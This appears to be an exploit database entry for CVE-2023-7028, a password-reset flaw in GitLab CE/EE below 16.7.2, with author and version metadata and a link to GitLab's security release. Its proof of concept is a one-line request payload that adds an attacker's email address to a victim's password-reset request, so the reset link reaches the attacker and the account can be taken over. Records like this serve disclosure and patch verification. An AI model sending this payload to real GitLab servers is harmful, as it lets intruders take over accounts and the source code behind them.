GitLab CE/EE < 16.7.2 - Password Reset

Author: 0xB455
type: remote
platform: java
port: 
date_added: 2024-03-14  
date_updated: 2024-03-14  
verified: 0  
codes: CVE-2023-7028  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 51889.txt  

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455

# Date: 2024-01-12
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028

Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com